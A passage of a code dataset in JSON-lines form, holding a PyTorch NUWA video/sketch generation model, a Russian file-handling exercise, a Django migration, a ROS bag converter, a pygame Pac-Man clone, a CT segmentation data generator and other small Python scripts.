frame_embeddings,\n audio_embeddings,\n context = text_embeds,\n context_mask = text_mask\n )\n\n logits = self.to_video_logits(frame_embeddings) if is_decoding_video else self.to_audio_logits(audio_embeddings)\n\n if cond_scale != 1:\n # discovery by Katherine Crowson\n # https://twitter.com/RiversHaveWings/status/1478093658716966912\n uncond_frame_embeddings, uncond_audio_embeddings = self.video_audio_transformer(\n frame_embeddings,\n audio_embeddings,\n context = text_embeds,\n context_mask = torch.zeros_like(text_mask).bool()\n )\n\n uncond_logits = self.to_video_logits(uncond_frame_embeddings) if is_decoding_video else self.to_audio_logits(uncond_audio_embeddings)\n logits = uncond_logits + (logits - uncond_logits) * cond_scale\n\n logits = logits[:, -1, :]\n\n filtered_logits = top_k(logits, thres = filter_thres)\n sample = gumbel_sample(filtered_logits, temperature = temperature, dim = -1)\n sample = rearrange(sample, 'b -> b 1')\n\n if is_decoding_video:\n video_indices = torch.cat((video_indices, sample), dim = 1)\n at_frame_boundary = (video_indices.shape[1] % num_tokens_per_frame) == 0\n else:\n audio_indices = torch.cat((audio_indices, sample), dim = 1)\n at_frame_boundary = (audio_indices.shape[1] % num_audio_tokens_per_video_frame) == 0\n\n # alternate between audio and video decoding, one video frame at a time\n\n if at_frame_boundary:\n is_decoding_video = not is_decoding_video\n\n # decoding video codebook indices with VQGan\n\n codes = self.vae.codebook[video_indices]\n codes = rearrange(codes, 'b (f h w) d -> (b f) d h w', h = self.video_fmap_size, w = self.video_fmap_size)\n\n image_reconstructions = batch_process(codes, self.vae.decode, chunks = decode_max_batchsize)\n video = rearrange(image_reconstructions, '(b f) d h w -> b f d h w', b = batch)\n\n # just return audio token indices for now\n\n audio = audio_indices\n\n return video, audio\n\n def forward(\n self,\n *,\n text,\n video,\n audio,\n return_loss = False,\n cond_dropout_prob = 0.2\n ):\n batch, seq_len, frames, device = *text.shape, video.shape[1], text.device\n\n text_mask = text != 0\n text_embeds = self.embed_text(text, mask = text_mask)\n\n # prep video representation\n\n assert frames == self.max_video_frames, f'you must give the full video frames ({self.max_video_frames}) during training'\n\n frame_indices = self.vae.get_video_indices(video)\n frame_indices = rearrange(frame_indices, 'b ... 
-> b (...)')\n frame_indices_input = frame_indices[:, :-1] if return_loss else frame_indices\n\n frame_embeddings = self.image_embedding(frame_indices_input)\n frame_embeddings = self.video_pos_emb()[:, :-1] + frame_embeddings\n\n video_bos = repeat(self.video_bos, 'd -> b 1 d', b = batch)\n frame_embeddings = torch.cat((video_bos, frame_embeddings), dim = 1)\n\n # prep audio representations\n\n audio_indices_input = audio[:, :-1] if return_loss else audio\n\n audio_embeddings = self.audio_embedding(audio_indices_input)\n audio_pos_emb = self.audio_pos_emb(torch.arange(audio_embeddings.shape[1], device = device))\n audio_embeddings = audio_embeddings + rearrange(audio_pos_emb, 'n d -> 1 n d')\n\n audio_bos = repeat(self.audio_bos, 'd -> b 1 d', b = batch)\n audio_embeddings = torch.cat((audio_bos, audio_embeddings), dim = 1)\n\n # null conditions, for super-conditioning\n\n if self.training and cond_dropout_prob > 0:\n # dropout condition randomly\n # presented in https://openreview.net/forum?id=qw8AKxfYbI\n uncond_mask = prob_mask_like((batch,), cond_dropout_prob, device = device)\n text_mask *= rearrange(~uncond_mask, 'b -> b 1')\n\n # twin attention towers for video and audio, with efficient chunked cross modality attention\n\n frame_embeddings, audio_embeddings = self.video_audio_transformer(\n frame_embeddings,\n audio_embeddings,\n context = text_embeds,\n context_mask = text_mask\n )\n\n video_logits = self.to_video_logits(frame_embeddings)\n audio_logits = self.to_audio_logits(audio_embeddings)\n\n if not return_loss:\n return video_logits, audio_logits\n\n video_loss = F.cross_entropy(rearrange(video_logits, 'b n c -> b c n'), frame_indices)\n audio_loss = F.cross_entropy(rearrange(audio_logits, 'b n c -> b c n'), audio)\n\n return video_loss + audio_loss * self.audio_loss_weight\n\n# main class for learning on sketches\n\nclass NUWASketch(nn.Module):\n def __init__(\n self,\n *,\n vae,\n sketch_vae,\n dim,\n image_size,\n max_video_frames = 5,\n sketch_max_video_frames = 2,\n sketch_enc_depth = 6,\n sketch_enc_dim_head = 64,\n sketch_enc_heads = 8,\n sketch_enc_use_sparse_3dna = False,\n enc_reversible = False,\n dec_depth = 6,\n dec_dim_head = 64,\n dec_heads = 8,\n dec_reversible = False,\n attn_dropout = 0.,\n ff_dropout = 0.,\n ff_chunk_size = None,\n embed_gradient_frac = 0.2,\n shift_video_tokens = True,\n cross_2dna_kernel_size = 3,\n cross_2dna_dilation = 1,\n sparse_3dna_kernel_size = 3,\n sparse_3dna_dilation = 1,\n sparse_3dna_query_num_frames_chunk = None,\n ):\n super().__init__()\n self.image_size = image_size\n\n self.sketch_vae = sketch_vae\n sketch_vae_num_layers = sketch_vae.num_layers\n sketch_num_image_tokens = sketch_vae.codebook_size\n sketch_fmap_size = image_size // (2 ** sketch_vae_num_layers)\n\n sketch_shape = (sketch_max_video_frames, sketch_fmap_size, sketch_fmap_size)\n\n self.sketch_max_video_frames = sketch_max_video_frames\n self.sketch_embedding = Embedding(sketch_num_image_tokens, dim, frac_gradient = embed_gradient_frac)\n self.sketch_pos_emb = AxialPositionalEmbedding(dim, shape = sketch_shape)\n\n # sparse 3dna kwargs\n\n sparse_3dna_dilations = tuple(range(1, sparse_3dna_dilation + 1)) if not isinstance(sparse_3dna_dilation, (list, tuple)) else sparse_3dna_dilation\n\n # encoder\n\n enc_transformer_klass = Transformer if not enc_reversible else ReversibleTransformer\n\n self.sketch_transformer = enc_transformer_klass(\n dim = dim,\n depth = sketch_enc_depth,\n heads = sketch_enc_heads,\n dim_head = sketch_enc_dim_head,\n attn_dropout = 
attn_dropout,\n ff_dropout = ff_dropout,\n shift_video_tokens = shift_video_tokens,\n sparse_3dna_video_shape = sketch_shape,\n sparse_3dna_kernel_size = sparse_3dna_kernel_size,\n sparse_3dna_dilations = sparse_3dna_dilations,\n sparse_3dna_query_num_frames_chunk = sparse_3dna_query_num_frames_chunk,\n sparse_3dna_attn = sketch_enc_use_sparse_3dna\n )\n\n # decoder parameters\n\n self.vae = vae\n\n vae_num_layers = vae.num_layers\n num_image_tokens = vae.codebook_size\n\n self.video_bos = nn.Parameter(torch.randn(dim))\n self.image_embedding = Embedding(num_image_tokens, dim, frac_gradient = embed_gradient_frac)\n\n fmap_size = image_size // (2 ** vae_num_layers)\n\n assert fmap_size == sketch_fmap_size, 'feature map size of video must be equal to the feature map size of sketches (VAEs must have same number of layers)'\n\n self.video_fmap_size = fmap_size\n self.max_video_frames = max_video_frames\n video_shape = (max_video_frames, fmap_size, fmap_size)\n\n self.video_pos_emb = AxialPositionalEmbedding(dim, shape = video_shape)\n\n # cycle dilation for sparse 3d-nearby attention\n\n cross_2dna_dilations = tuple(range(1, cross_2dna_dilation + 1)) if not isinstance(cross_2dna_dilation, (list, tuple)) else cross_2dna_dilation\n dec_transformer_klass = Transformer if not dec_reversible else ReversibleTransformer\n\n self.video_transformer = dec_transformer_klass(\n dim = dim,\n depth = dec_depth,\n heads = dec_heads,\n dim_head = dec_dim_head,\n causal = True,\n cross_attend = True,\n cross_2dna_attn = True,\n cross_2dna_image_size = fmap_size,\n cross_2dna_kernel_size = cross_2dna_kernel_size,\n cross_2dna_dilations = cross_2dna_dilations,\n attn_dropout = attn_dropout,\n ff_dropout = ff_dropout,\n ff_chunk_size = ff_chunk_size,\n shift_video_tokens = shift_video_tokens,\n sparse_3dna_video_shape = video_shape,\n sparse_3dna_kernel_size = sparse_3dna_kernel_size,\n sparse_3dna_dilations = sparse_3dna_dilations,\n sparse_3dna_query_num_frames_chunk = sparse_3dna_query_num_frames_chunk,\n sparse_3dna_attn = True\n )\n\n self.to_logits = nn.Linear(dim, num_image_tokens)\n\n def embed_sketch(self, sketch, mask = None):\n batch, frames, channels, image_size, _, device = *sketch.shape, sketch.device\n\n if exists(mask):\n assert mask.shape[:2] == (batch, frames), 'sketch mask must be in shape of (batch x frame)'\n\n sketch_indices = self.sketch_vae.get_video_indices(sketch)\n sketch_indices = rearrange(sketch_indices, 'b ... 
-> b (...)')\n sketch_tokens = self.sketch_embedding(sketch_indices)\n\n num_tokens = sketch_tokens.shape[1]\n\n sketch_pos_emb = self.sketch_pos_emb()\n sketch_pos_emb = sketch_pos_emb[:, :num_tokens]\n\n sketch_tokens = sketch_tokens + sketch_pos_emb\n\n if exists(mask):\n mask = repeat(mask, 'b f -> b (f n)', n = (num_tokens // frames))\n else:\n mask = torch.ones((batch, num_tokens), dtype = torch.bool, device = device)\n\n embed = self.sketch_transformer(sketch_tokens, mask = mask)\n return embed, mask\n\n @torch.no_grad()\n @eval_decorator\n def generate(\n self,\n *,\n sketch,\n sketch_mask = None,\n filter_thres = 0.9,\n temperature = 1.,\n decode_max_batchsize = 10,\n cond_scale = 2.,\n num_frames = None\n ):\n batch, device = sketch.shape[0], sketch.device\n\n sketch_embeds, decoder_context_mask = self.embed_sketch(sketch, mask = sketch_mask)\n\n bos = repeat(self.video_bos, 'd -> b 1 d', b = batch)\n\n video_indices = torch.empty((batch, 0), device = device, dtype = torch.long)\n\n num_tokens_per_frame = self.video_fmap_size ** 2\n\n num_frames = default(num_frames, self.max_video_frames)\n total_video_tokens = num_tokens_per_frame * num_frames\n max_video_tokens = num_tokens_per_frame * self.max_video_frames\n\n pos_emb = self.video_pos_emb()\n\n for ind in range(total_video_tokens):\n video_indices_input = video_indices\n\n num_video_tokens = video_indices.shape[1]\n if num_video_tokens > max_video_tokens:\n curr_frame_tokens = num_video_tokens % num_tokens_per_frame\n lookback_tokens = (self.max_video_frames - (0 if curr_frame_tokens == 0 else 1)) * num_tokens_per_frame + curr_frame_tokens\n video_indices_input = video_indices[:, -lookback_tokens:]\n\n frame_embeddings = self.image_embedding(video_indices_input)\n frame_embeddings = pos_emb[:, :frame_embeddings.shape[1]] + frame_embeddings\n frame_embeddings = torch.cat((bos, frame_embeddings), dim = 1)\n\n frame_embeddings = self.video_transformer(\n frame_embeddings,\n context = sketch_embeds,\n context_mask = decoder_context_mask\n )\n\n logits = self.to_logits(frame_embeddings)\n\n if cond_scale != 1:\n # discovery by Katherine Crowson\n # https://twitter.com/RiversHaveWings/status/1478093658716966912\n uncond_frame_embeddings = self.video_transformer(\n frame_embeddings,\n context = sketch_embeds,\n context_mask = torch.zeros_like(decoder_context_mask).bool()\n )\n\n uncond_logits = self.to_logits(uncond_frame_embeddings)\n logits = uncond_logits + (logits - uncond_logits) * cond_scale\n\n logits = logits[:, -1, :]\n\n filtered_logits = top_k(logits, thres = filter_thres)\n sample = gumbel_sample(filtered_logits, temperature = temperature, dim = -1)\n sample = rearrange(sample, 'b -> b 1')\n video_indices = torch.cat((video_indices, sample), dim = 1)\n\n codes = self.vae.codebook[video_indices]\n codes = rearrange(codes, 'b (f h w) d -> (b f) d h w', h = self.video_fmap_size, w = self.video_fmap_size)\n\n image_reconstructions = batch_process(codes, self.vae.decode, chunks = decode_max_batchsize)\n video = rearrange(image_reconstructions, '(b f) d h w -> b f d h w', b = batch)\n return video\n\n def forward(\n self,\n *,\n sketch,\n sketch_mask = None,\n video = None,\n return_loss = False,\n cond_dropout_prob = 0.2\n ):\n # handle one sketch gracefully\n\n if sketch.ndim == 4:\n sketch = rearrange(sketch, 'b c h w -> b 1 c h w')\n\n # get a bunch of variables\n\n batch, sketch_frames, sketch_channels, sketch_image_size, _, frames, device = *sketch.shape, video.shape[1], sketch.device\n\n # guardrails\n\n assert 
sketch_image_size == self.image_size, 'sketch image size must be equal'\n assert sketch_frames <= self.sketch_max_video_frames, 'sketch frames must be less than max sketch video frames'\n\n # get sketch embeddings, and calculate mask (for now, assume no padding)\n\n sketch_embeds, decoder_context_mask = self.embed_sketch(sketch, mask = sketch_mask)\n\n assert frames == self.max_video_frames, f'you must give the full video frames ({self.max_video_frames}) during training'\n\n frame_indices = self.vae.get_video_indices(video)\n frame_indices = rearrange(frame_indices, 'b ... -> b (...)')\n frame_indices_input = frame_indices[:, :-1] if return_loss else frame_indices\n\n frame_embeddings = self.image_embedding(frame_indices_input)\n frame_embeddings = self.video_pos_emb()[:, :-1] + frame_embeddings\n\n bos = repeat(self.video_bos, 'd -> b 1 d', b = batch)\n frame_embeddings = torch.cat((bos, frame_embeddings), dim = 1)\n\n if self.training and cond_dropout_prob > 0:\n # dropout condition randomly\n # presented in https://openreview.net/forum?id=qw8AKxfYbI\n uncond_mask = prob_mask_like((batch,), cond_dropout_prob, device = device)\n sketch_mask *= rearrange(~uncond_mask, 'b -> b 1')\n\n frame_embeddings = self.video_transformer(\n frame_embeddings,\n context = sketch_embeds,\n context_mask = decoder_context_mask\n )\n\n logits = self.to_logits(frame_embeddings)\n\n if not return_loss:\n return logits\n\n loss = F.cross_entropy(rearrange(logits, 'b n c -> b c n'), frame_indices)\n return loss\n","repo_name":"gmyofustc/nuwa-pytorch","sub_path":"nuwa_pytorch/nuwa_pytorch.py","file_name":"nuwa_pytorch.py","file_ext":"py","file_size_in_byte":94793,"program_lang":"python","lang":"en","doc_type":"code","dataset":"github-code","pt":"44"} +{"seq_id":"18283912209","text":"# В текстовый файл построчно записаны фамилия и имя каждого учащегося класса и их оценка за контрольную.\n# Вывести на экран всех учащихся, чья оценка меньше 3 баллов, и посчитать средний балл по классу.\nf = 'spisok.txt'\nwith open(f, encoding='utf8') as content:\n content = content.read()\ncontent = content.split(\"\\n\")\nstudents = []\nfor line in content:\n line = line.split(\" \")\n students.append([line[0], line[1], int(line[2])])\nsr = 0\nprint(\"Ниже 3 баллов:\")\nfor s in students:\n sr += int(s[2])\n if s[2] < 3:\n print(f\"{s[0]} {s[1]}: {s[2]}\")\nsr/= len(students)\nprint(f\"Средняя оценка по классу: {sr}\")\n\n#Создать текстовый файл, записать в него построчно данные, которые вводит пользователь.\n# Окончанием ввода пусть служит пустая строка.\nfilename = 'text.txt'\nf = open(filename,'w')\ni = 0\nwhile True:\n s = input('Введите строку '+str(i+1)+': ')\n i += 1\n if s == '': break\n f.write(s+'\\n')\nf.close()\nwith open(filename, 'r') as file:\n for s in file:\n print(s, end='')","repo_name":"AliceMonte/lesson1","sub_path":"lesson 21.py","file_name":"lesson 21.py","file_ext":"py","file_size_in_byte":1327,"program_lang":"python","lang":"ru","doc_type":"code","stars":0,"dataset":"github-code","pt":"44"} +{"seq_id":"70934841094","text":"# -*- coding: utf-8 -*-\nfrom django.db import models, migrations\n\n\nclass Migration(migrations.Migration):\n\n dependencies = [\n ('pages', '0002_page_requires_authentication'),\n ]\n\n operations = [\n migrations.AddField(\n model_name='page',\n name='hide_from_anonymous',\n field=models.BooleanField(default=False, help_text=\"Hide this link from users that aren't logged in\"),\n ),\n 
]\n","repo_name":"onespacemedia/cms","sub_path":"cms/apps/pages/migrations/0003_page_hide_from_anonymous.py","file_name":"0003_page_hide_from_anonymous.py","file_ext":"py","file_size_in_byte":442,"program_lang":"python","lang":"en","doc_type":"code","stars":14,"dataset":"github-code","pt":"44"} +{"seq_id":"28142027833","text":"import cv2\nimport numpy as np\nfrom .color_classes import color_classes\n\ndef img_to_npy(input_path, out_path):\n # Učitavanje slike za trening i legende\n slo_image = cv2.imread(input_path)\n\n # Inicijalizacija matrice za čuvanje rezultata\n out_slo = np.zeros((slo_image.shape[0], slo_image.shape[1]), dtype=np.uint8)\n\n # Pretraživanje slike za trening i mapiranje boja na klase\n for i in range(slo_image.shape[0]):\n for j in range(slo_image.shape[1]):\n color_temp = tuple(slo_image[i, j])\n color = set(color_temp)\n for key in color_classes.keys():\n key = set(key)\n if color == key:\n out_slo[i, j] = map_values_to_key(color, color_classes)\n\n # Čuvanje rezultujuće matrice\n save(out_path, out_slo)\n\n\ndef save(out_path, out_npy):\n out_npy = out_npy.astype(int)\n np.save(out_path, out_npy)\n\n\ndef map_values_to_key(my_set, color_classes):\n for key, value in color_classes.items():\n if set(key) == my_set:\n return value\n return None","repo_name":"Obradowski1389/HSA_DataScience_ML","sub_path":"scripts/img_to_npy.py","file_name":"img_to_npy.py","file_ext":"py","file_size_in_byte":1071,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"44"} +{"seq_id":"16046125505","text":"import sys, os\nimport argparse\n\nimport numpy as np\nimport rosbag\n\nsys.path.append(os.path.join(os.getcwd(), \"pyutils\"))\nimport to_json\n\n\nparser = argparse.ArgumentParser()\nparser.add_argument('-bagfile', required=True)\nparser.add_argument('-motiontopic', default='/xivo/fullstate')\nparser.add_argument('-maptopic', default='/xivo/map')\nparser.add_argument('-dataset', default='tumvi')\nparser.add_argument('-seq', default='room1')\nparser.add_argument('-sen', default='tango_top')\nparser.add_argument('-cam_id', default=0, type=int)\n\n\n\ndef rosvec_to_list(rosvec):\n return [ rosvec.x, rosvec.y, rosvec.z ]\n\ndef rosquat_to_list(rosquat):\n return [ rosquat.w, rosquat.x, rosquat.y, rosquat.z ]\n\n\ndef roslist_to_list(roslist, length):\n out = []\n for i in range(length):\n out.append(roslist[i])\n return out\n\n\ndef main(bagfilename, motiontopic, maptopic, output_file):\n bagfile = rosbag.Bag(bagfilename, mode='r')\n\n # data structure that maps timestamp to a dictionary\n alltimesteps = {}\n\n # parse fullstate topic\n for _,msg,_ in bagfile.read_messages(topics=motiontopic):\n entry = {}\n\n ts = msg.header.stamp.secs*1000000000 + msg.header.stamp.nsecs\n\n entry['group'] = msg.group\n\n entry['ImagePath'] = ''\n entry['Timestamp'] = ts\n entry['Tsb_XYZ'] = rosvec_to_list(msg.gsb.translation)\n entry['qsb_WXYZ'] = rosquat_to_list(msg.gsb.rotation)\n entry['Tbc_XYZ'] = rosvec_to_list(msg.gbc.translation)\n entry['qbc_WXYZ'] = rosquat_to_list(msg.gbc.rotation)\n entry['Tsc_XYZ'] = rosvec_to_list(msg.gsc.translation)\n entry['qsc_WXYZ'] = rosquat_to_list(msg.gsc.rotation)\n entry['Vsb_XYZ'] = rosvec_to_list(msg.Vsb)\n\n entry['Pstate'] = [ msg.MotionStateSize, list(msg.covariance) ]\n\n entry['MeasurementUpdateInitialized'] = bool(msg.MeasurementUpdateInitialized)\n entry['inn_Tsb'] = rosvec_to_list(msg.inn_Tsb)\n entry['inn_Wsb'] = rosvec_to_list(msg.inn_Wsb)\n entry['inn_Vsb'] = rosvec_to_list(msg.inn_Vsb)\n\n entry['bg'] = 
rosvec_to_list(msg.bg)\n entry['ba'] = rosvec_to_list(msg.ba)\n entry['qg_WXYZ'] = rosquat_to_list(msg.qg)\n entry['td'] = msg.td\n entry['Ca'] = list(msg.Ca)\n entry['Cg'] = list(msg.Cg)\n\n alltimesteps[ts] = entry\n\n # Parse map topic\n for _,msg,_ in bagfile.read_messages(topics=maptopic):\n\n ts = msg.header.stamp.secs*1000000000 + msg.header.stamp.nsecs\n\n entry = alltimesteps[ts]\n\n feature_positions = []\n feature_ids = []\n feature_covariances = []\n\n for feature in msg.features:\n feature_ids.append(feature.id)\n feature_positions.extend(rosvec_to_list(feature.Xs))\n\n cov = roslist_to_list(feature.covariance, 9)\n feature_covariances.extend([cov[0], cov[1], cov[2], cov[4], cov[5], cov[8]])\n\n entry['num_instate_features'] = msg.num_features\n entry['feature_positions'] = feature_positions\n entry['feature_covs'] = feature_covariances\n entry['feature_ids'] = feature_ids\n\n alltimesteps[ts] = entry\n\n # sort timestamps\n timestamps = alltimesteps.keys()\n timestamps.sort()\n\n # create list of dictionaries\n final_list = []\n for ts in timestamps:\n final_list.append(alltimesteps[ts])\n\n json_string = to_json.to_json(final_list)\n with open(output_file, 'w') as fid:\n fid.write(json_string)\n\n\n\nif __name__==\"__main__\":\n args = parser.parse_args()\n\n if args.dataset==\"tumvi\":\n output_filename = \"tumvi_{}_cam{}\".format(args.seq, args.cam_id)\n elif args.dataset==\"cosyvio\":\n output_filename = \"cosyvio_{}_{}\".format(args.sen, args.seq)\n else:\n output_filename = \"{}_{}\".format(args.dataset, args.seq)\n\n main(args.bagfile, args.motiontopic, args.maptopic, output_filename)\n","repo_name":"stephanietsuei/learned-uncertainty-calibration","sub_path":"run/xivo/rosbag_to_json.py","file_name":"rosbag_to_json.py","file_ext":"py","file_size_in_byte":3636,"program_lang":"python","lang":"en","doc_type":"code","stars":8,"dataset":"github-code","pt":"44"} +{"seq_id":"72288270852","text":"class Solution(object):\n\n def getId(self, x, w):\n if x < 0:\n return (x+1)/w - 1\n else:\n return x/w\n \n def containsNearbyAlmostDuplicate(self, nums, k, t):\n \"\"\"\n :type nums: List[int]\n :type k: int\n :type t: int\n :rtype: bool\n \"\"\"\n if t < 0: return False\n dic = {}\n w = t+1\n for i in range(len(nums)):\n idd = self.getId(nums[i], w)\n if idd in dic:\n return True\n if idd-1 in dic and abs(nums[i] - dic[idd-1]) < w:\n return True\n if idd+1 in dic and abs(nums[i] - dic[idd+1]) < w:\n return True\n dic[idd] = nums[i]\n if i>= k: del dic[self.getId(nums[i-k],w)]\n return False","repo_name":"JerryHu1994/LeetCode-Practice","sub_path":"Solutions/220-Contains-Duplicate-III/python.py","file_name":"python.py","file_ext":"py","file_size_in_byte":804,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"44"} +{"seq_id":"23323121485","text":"N, K = map(int, input().split())\r\nstr = input()\r\n\r\nlastH = -1\r\nresult = 0\r\nfor i in range(N):\r\n if str[i] == 'P':\r\n mostLeft = max(0, i-K, lastH)\r\n mostRight = min(N-1, i+K)\r\n for j in range(mostLeft, mostRight+1):\r\n if str[j] == 'H' and j != lastH:\r\n lastH = j\r\n result += 1\r\n break \r\n\r\nprint(result)","repo_name":"JeonghyeonK/python-algorithm","sub_path":"대기업 코테 유형 모음/19941.py","file_name":"19941.py","file_ext":"py","file_size_in_byte":383,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"44"} +{"seq_id":"32624872574","text":"import os\n\nimport numpy as np\n\nfrom tensorflow.keras.utils import Sequence\nfrom 
tensorflow.keras.preprocessing.image import ImageDataGenerator\n\nfrom imageio import imread\nfrom scipy.special import expit\nfrom skimage.transform import resize\n\n\nclass SegmentationSequence(Sequence):\n\n def __init__(self, images, masks, batch_size, jitter=False):\n self.masks = masks\n self.images = images\n self.batch_size = batch_size\n self.shuffled_indices = np.random.permutation(self.images.shape[0])\n self.jitter = jitter\n if self.jitter:\n self.jitter_datagen = ImageDataGenerator(rotation_range=5,\n width_shift_range=0.05,\n height_shift_range=0.05,\n fill_mode=\"nearest\")\n\n def __len__(self):\n return self.images.shape[0] // self.batch_size\n\n def __getitem__(self, idx):\n\n # The shuffled indices in this batch\n batch_inds = self.shuffled_indices[idx * self.batch_size : (idx + 1) * self.batch_size]\n\n if self.jitter:\n\n batch_images_list = []\n batch_masks_list = []\n\n for i in batch_inds:\n # Stack mask and image together to ensure that they are transformed\n # in exactly the same way\n stacked = np.dstack([self.images[i, :, :, :].astype(np.uint8), self.masks[i, :, :, :]])\n transformed = self.jitter_datagen.random_transform(stacked)\n\n batch_images_list.append(transformed[:, :, 0].astype(float))\n batch_masks_list.append(transformed[:, :, 1])\n\n batch_images = np.dstack(batch_images_list)\n batch_images = np.transpose(batch_images[:, :, :, np.newaxis], [2, 0, 1, 3])\n batch_masks = np.dstack(batch_masks_list)\n batch_masks = np.transpose(batch_masks[:, :, :, np.newaxis], [2, 0, 1, 3])\n\n else:\n\n # Slice images and labels for this batch\n batch_images = self.images[ batch_inds, :, :, :]\n batch_masks = self.masks[ batch_inds, :, :, :]\n\n return (batch_images, batch_masks)\n\n def on_epoch_end(self):\n # Shuffle the dataset indices again\n self.shuffled_indices = np.random.permutation(self.images.shape[0])\n\n\nclass SliceSelectionSequence(Sequence):\n\n def __init__(self, labels, image_dir, batch_size, batches_per_epoch,\n jitter=False, sigmoid_scale=None):\n self.labels = labels\n self.image_dir = image_dir\n self.batch_size = batch_size\n self.batches_per_epoch = batches_per_epoch\n self.jitter = jitter\n self.sigmoid_scale = sigmoid_scale\n self.shuffled_indices = np.random.permutation(len(labels))\n if self.jitter:\n self.jitter_datagen = ImageDataGenerator(rotation_range=5,\n width_shift_range=0.05,\n height_shift_range=0.05,\n fill_mode=\"constant\",\n cval=0)\n\n def __len__(self):\n return self.batches_per_epoch\n\n def __getitem__(self, idx):\n\n # The shuffled indices in this batch\n batch_inds = self.shuffled_indices[idx * self.batch_size: (idx + 1) * self.batch_size]\n\n # Labels for this batch\n batch_labels = self.labels[batch_inds]\n\n # Soft-threshold the distances using a sigmoid\n if self.sigmoid_scale is not None:\n batch_labels = expit(batch_labels / self.sigmoid_scale)\n\n # The images for this batch\n images_list = []\n for i in batch_inds:\n\n # Load in image\n filename = os.path.join(self.image_dir, str(i).zfill(6) + '.png')\n im = resize(imread(filename), (256, 256), mode='constant',\n preserve_range=True, anti_aliasing=True)[:, :, np.newaxis]\n\n # Apply random jitter (rotation, shift, zoom)\n if self.jitter:\n im = self.jitter_datagen.random_transform(im)\n\n images_list.append(im)\n\n batch_images = np.dstack(images_list).astype(float)\n batch_images = np.transpose(batch_images[:, :, :, np.newaxis], [2, 0, 1, 3])\n\n return (batch_images, batch_labels)\n\n def on_epoch_end(self):\n # Shuffle the dataset indices again\n required = 
self.batches_per_epoch * self.batch_size\n use_replacement = required > len(self.labels)\n self.shuffled_indices = np.random.choice(len(self.labels), required, replace=use_replacement)\n","repo_name":"CPBridge/ct_body_composition","sub_path":"body_comp/train/generators.py","file_name":"generators.py","file_ext":"py","file_size_in_byte":4711,"program_lang":"python","lang":"en","doc_type":"code","stars":16,"dataset":"github-code","pt":"44"} +{"seq_id":"28199838543","text":"import Characters\nimport pygame\nimport yaml\n\n\nwith open('Configuration.yaml', 'r') as yamlConfig:\n config = yaml.load(yamlConfig, Loader=yaml.FullLoader)\n\nk_adapter = config['window_config']['window_images_adapter']\nk_black = config['colors']['black']\nk_blue = config['colors']['blue']\nk_column = config['window_config']['column_number']\nk_fps = config['FPS']\nk_height = config['window_config']['height']\nk_movement = config['movement']\nk_row = config['window_config']['row_number']\nk_width = config['window_config']['width']\n\nk_sources = config['src']\n\nwith open(k_sources['map'], 'r') as maze_file:\n k_maze = maze_file.readlines()\n\n\ndef game_state_draw(maze, player, size_x, size_y, window):\n y = 0\n\n for row in maze:\n x = 0\n for item in row:\n if item == '0':\n pygame.draw.rect(window, (k_black['red'], k_black['green'], k_black['blue']), pygame.Rect(x, y, size_x,\n size_y))\n if item == '1':\n pygame.draw.rect(window, (k_blue['red'], k_blue['green'], k_blue['blue']), pygame.Rect(x, y, size_x,\n size_y))\n x += size_x\n y += size_y\n\n window.blit(pygame.transform.scale(pygame.image.load(player.get_image()), (player.get_size_x(), player.get_size_y())\n ), (player.get_x(), player.get_y()))\n\n pygame.display.update()\n\n\ndef __main__():\n run = True\n\n size_x = (k_width//k_row)\n size_y = (k_height//k_column)\n\n character_x = (k_width//2) - (2 * size_x)\n character_y = 0\n while character_y < k_height/2:\n character_y += size_y\n\n pygame.init()\n pygame.Surface((k_width - (k_width - size_x * k_row), k_height - (k_height - size_y * k_column)))\n window = pygame.display.set_mode((k_width - (k_width - size_x * k_row), k_height - (k_height - size_y * k_column)))\n pygame.display.set_caption('PUC-MAN')\n\n k_clock = pygame.time.Clock()\n\n player = Characters.Player(k_sources['images']['player']['left'], character_x, character_y, (size_x * k_adapter),\n (size_y * k_adapter), k_maze, k_movement, k_row, k_column, k_adapter)\n player.start()\n\n while run:\n k_clock.tick(k_fps)\n\n game_state_draw(k_maze, player, size_x, size_y, window)\n\n for event in pygame.event.get():\n if event.type == pygame.QUIT:\n run = False\n player.set_run(False)\n\n key_pressed = pygame.key.get_pressed()\n if key_pressed[pygame.K_DOWN]:\n player.set_direction(player.get_down())\n player.set_image(k_sources['images']['player']['down'])\n if key_pressed[pygame.K_LEFT]:\n player.set_direction(player.get_left())\n player.set_image(k_sources['images']['player']['left'])\n if key_pressed[pygame.K_RIGHT]:\n player.set_direction(player.get_right())\n player.set_image(k_sources['images']['player']['right'])\n if key_pressed[pygame.K_UP]:\n player.set_direction(player.get_up())\n player.set_image(k_sources['images']['player']['up'])\n\n pygame.display.update()\n\n pygame.quit()\n\n\nif __name__ == '__main__':\n __main__()\n","repo_name":"Vikuzo/Pycman","sub_path":"Game.py","file_name":"Game.py","file_ext":"py","file_size_in_byte":3438,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"44"} 
+{"seq_id":"24340172829","text":"import operator\nfrom collections import deque\nfrom enum import Enum\n\nOPEN_BRACKET = '('\nCLOSE_BRACKET = ')'\nPLUS, MINUS, MUL = '+', '-', '*'\n\n\nclass NamedFunction:\n def __init__(self, name, op):\n self.name = name\n self.op = op\n\n def __call__(self, *args, **kwargs):\n return self.op(*args, **kwargs)\n\n\nFUNCTIONS = [NamedFunction('Podarok', lambda x: x + 5 if x > 0 else abs(x))]\n\n\nclass ParseException(Exception):\n pass\n\n\nclass TokenType(Enum):\n OPERATOR = 0\n BRACKET = 1\n NUMBER = 2\n STRING = 3\n FUNCTIONS = 4\n END = 5\n\n\nclass Token:\n BRACKETS = {OPEN_BRACKET, CLOSE_BRACKET}\n OPERATORS_MAP = {PLUS: operator.add, MINUS: operator.sub, MUL: operator.mul}\n FUNCTIONS_MAP = {fun.name: fun for fun in FUNCTIONS}\n CONST = {'Ded Moroz': 2020, 'Moroz': -30, 'Snegurochka': 10}\n END = '.'\n\n def __init__(self, token_type: TokenType, value, op=None):\n self.token_type = token_type\n self.value = value\n self.op = op\n\n @staticmethod\n def parse(value):\n if value == Token.END:\n return Token(TokenType.END, value)\n if value in Token.BRACKETS:\n return Token(TokenType.BRACKET, value)\n if value in Token.OPERATORS_MAP:\n return Token(TokenType.OPERATOR, value, Token.OPERATORS_MAP[value])\n try:\n int_value = int(value)\n return Token(TokenType.NUMBER, int_value)\n except 